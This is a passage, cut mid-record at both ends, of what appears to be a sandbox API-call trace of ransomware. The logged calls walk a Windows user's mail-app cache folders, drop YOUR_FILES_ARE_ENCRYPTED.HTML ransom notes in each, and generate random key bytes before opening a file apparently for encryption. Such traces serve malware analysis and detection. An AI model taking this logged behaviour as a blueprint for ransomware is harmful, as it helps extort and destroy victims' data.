lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.180] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.180] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.180] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.180] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0120.180] GetProcessHeap () returned 0x600000 [0120.180] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.181] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.182] CloseHandle (hObject=0x320) returned 1 [0120.182] GetProcessHeap () returned 0x600000 [0120.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.182] GetProcessHeap () returned 0x600000 [0120.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.182] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.182] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.182] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies") returned 113 [0120.182] GetProcessHeap () returned 0x600000 [0120.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.183] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies" [0120.183] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.183] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.183] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6e5fe6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6e5fe6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.183] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.183] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0120.183] GetProcessHeap () returned 0x600000 [0120.183] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.184] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.185] CloseHandle (hObject=0x320) returned 1 [0120.185] GetProcessHeap () returned 0x600000 [0120.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.186] GetProcessHeap () returned 0x600000 [0120.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.186] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.186] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.186] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory") returned 113 [0120.186] GetProcessHeap () returned 0x600000 [0120.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.186] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory" [0120.186] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.186] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdc6e5fe6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.186] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0120.186] StrStrIW (lpFirst="BackgroundTransferApi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.186] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi") returned 135 [0120.186] GetProcessHeap () returned 0x600000 [0120.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0120.187] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi" [0120.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\*" [0120.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.187] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName="..", cAlternateFileName="")) returned 1 [0120.187] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0120.187] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.187] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\container.dat") returned 149 [0120.188] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0120.188] lstrlenW (lpString=".dat") returned 4 [0120.188] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0120.188] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0120.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapi\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0120.189] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0120.189] CloseHandle (hObject=0x338) returned 1 [0120.189] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0120.189] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.189] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 165 [0120.189] GetProcessHeap () returned 0x600000 [0120.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.190] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0120.191] CloseHandle (hObject=0x324) returned 1 [0120.191] GetProcessHeap () returned 0x600000 [0120.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.191] GetProcessHeap () returned 0x600000 [0120.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0120.191] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 1 [0120.191] StrStrIW (lpFirst="BackgroundTransferApiGroup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.191] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup") returned 140 [0120.191] GetProcessHeap () returned 0x600000 [0120.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0120.191] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup" [0120.191] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\*" [0120.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.192] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName="..", cAlternateFileName="")) returned 1 [0120.192] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3583d37b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3583d37b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3583d37b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8194, dwReserved1=0x6f80b0, cFileName="..", cAlternateFileName="")) returned 0 [0120.192] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.192] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 170 [0120.192] GetProcessHeap () returned 0x600000 [0120.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApiGroup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\backgroundtransferapigroup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.193] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0120.194] CloseHandle (hObject=0x324) returned 1 [0120.194] GetProcessHeap 